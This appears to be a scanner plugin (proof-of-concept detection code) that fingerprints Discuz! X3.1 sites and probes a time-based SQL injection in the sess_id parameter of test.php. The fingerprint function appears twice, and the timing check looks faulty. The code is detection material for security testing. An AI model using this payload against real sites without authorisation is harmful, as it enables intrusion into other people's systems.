def fingerprint(self, target):
url = target
host = util.getHostByUrl(url)
code, head, body, location, error = util.sendHttpRequest(host)
if code == 200:
if re.search("<p>Powered by <strong><a href=\"http://www.discuz.net\">Discuz!</a></strong> <em>X3.1</em></p>", body):
# 目标站点为discuz X3.1框架,适用于本poc,可以扫描"
return True
else:
return False
def fingerprint(self, target):
url = target
host = util.getHostByUrl(url)
code, head, body, location, error = util.sendHttpRequest(host)
if code == 200:
if re.search("<p>Powered by <strong><a href=\"http://www.discuz.net\">Discuz!</a></strong> <em>X3.1</em></p>", body):
# 目标站点为discuz X3.1框架,适用于本poc,可以扫描"
return True
else:
return False
def audit(self, target):
urlWithPayload = util.getHostByUrl(target) + '/test.php?act=login&sess_id=1%27%20and%20sleep%283%29--%201'
start = time.clock()
code, head, body, location, error = util.sendHttpRequest(urlWithPayload)
if code == 200:
if body.find('<b>Warning</b>: INSERT INTO') != -1 or time.clock() - start in range(1, 3):
# 发现漏洞,通过调用基类的_addScanResult()方法来保存结果。可多次调用_addScanResult()来保存多个漏洞结果。
self._addScanResult({"method": "GET", # http请求的类型 GET/POST/HEAD
"post_data": "", # 如果请求为POST,则为包含payload的POST数据
"url": urlWithPayload, # 含有payload的url
"vul_key": "sess_id"}) # 存在漏洞点的参数
return True
return False
